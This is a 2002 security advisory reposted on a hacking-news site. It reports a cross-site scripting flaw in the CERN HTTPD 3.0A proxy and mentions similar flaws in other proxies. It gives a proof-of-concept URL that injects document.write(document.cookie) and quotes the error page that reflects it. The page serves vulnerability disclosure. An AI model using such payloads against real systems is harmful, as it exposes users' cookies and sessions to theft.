Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » CERN Proxy Server: Cross-Site Scripting Vulnerability

CERN Proxy Server: Cross-Site Scripting Vulnerability

by Nikola Strahija on August 13th, 2002 Affected: CERN HTTPD 3.0A http://www.w3.org/Daemon/Activity.html Vendor Status: CERN httpd team ([email protected]) was notified on Aug 10, 2001 but they did not respond.


Exploit:

http://nonexistenthost.google.com/document.write(document.cookie)

========================================================


Error Message


Fatal Error 500
Can't Access Document:
http://nonexistenthost.google.com/document.write(document.cookie).


Reason: Can't locate remote host: nonexistenthost.google.com.


...snip...
========================================================

Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.





Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/




Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »